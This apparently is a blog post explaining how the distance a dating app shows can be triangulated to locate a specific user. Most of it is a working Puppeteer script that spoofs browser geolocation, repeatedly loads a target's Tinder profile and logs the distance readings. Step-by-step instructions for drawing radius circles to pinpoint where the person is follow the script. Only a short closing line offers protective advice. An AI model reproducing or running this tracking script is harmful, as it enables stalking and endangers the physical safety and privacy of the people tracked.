Typical dating apps let you specify a location, so you can look for people from your proximity. You can specify the “range” of how far you want to look for them. Most importantly, these apps do show you the distance to the person you want to chat with. And this poses a security risk. Not a computer security, but a physical one.
First, just by seeing the distance down to miles, you can tell whether the person is at “home” or moved somewhere else – be it a workplace, a family hometown, or anywhere else. And if you know the person’s private life (like where are they from, etc.), you can say where they are just by seeing a very imprecise distance, like 1 mile versus 150 miles.
Second, dating apps have quite a good precision. For instance, Tinder used to report the distance down to 100 feet. They changed it to 1 mile, exactly due to privacy concerns. However, this doesn’t solve the issue. Given enough time, you can just roam around the town, and measure the reported distance. Even if it says “1 mile” vs “2 miles”, you can still approximate the whereabouts. This is actually even easier if you use extensions to spoof your browser’s location, for instance Location Guard. You change your location to various different points, then you triangulate the location with KML or Radius Around Point or something similar. The more points you have, the more precise location you get. That’s with the assumption that the person you’re tracking doesn’t move which is a reasonable assumption every night.
Obviously, this method won’t give you an apartment number, or even a 100% precise location in a congested city. However, it’ll be more than enough when we’re talking suburbs.
How hard is it? Let’s try the following puppeteer script against Tinder:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 |
var startingLong = 123; var startingLat = 456; var shouldRandomizeAgain = false; var latOffset = 0; var longOffset = 0; var lastResponse = ""; while(true){ if(shouldRandomizeAgain){ latOffset = Math.random() * 3; longOffset = Math.random() * 3; shouldRandomizeAgain = false; } try{ browser = await puppeteer.launch({userDataDir: "datadir"}); const page = await browser.newPage(); var client = await page.target().createCDPSession(); await client.send('Emulation.setGeolocationOverride', { accuracy: 100, latitude: startingLat + latOffset, longitude: startingLong + longOffset, }); await page.goto("https://tinder.com/app/messages/id_of_the_profile_you_want_to_track/profile")); await page.setGeolocation({latitude: startingLat + latOffset, longitude: startingLong + longOffset}); var distance = await page.evaluate(() => document.getElementsByClassName("C($c-ds-text-secondary)")[1].innerText); if(distance != lastResponse && distance.indexOf("away") > 0){ console.log({ longitude: startingLong + longOffset, latitude: startingLat + latOffset, distance: distance }); lastResponse = distance; shouldRandomizeAgain = true; } await browser.close(); }catch (e){ console.log(e); } } |
Let it run for a while, like 20-30 minutes. It should print something similar to:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
{ longitude: 123, latitude: 456, distance: '789 kilometers away' } { longitude: 321, latitude: 654, distance: '987 kilometers away' } { longitude: 111, latitude: 222, distance: '333 kilometers away' } |
You probably can ignore your first reading because Tinder doesn’t refresh your location immediately. Once you have a couple of readings, you can go to Radius Around Point and draw come circles. Notice, that you can draw multiple circles over one map (just change values in the inputs, and click “Draw” again). The more readings you get, the more precise your result is.
So how can we protect against that? The only solution seems to be hiding the feature. You should disable the option to report your location to other users, so they won’t be able to see it. Obviously, this may not be included in the free plan of the app you use.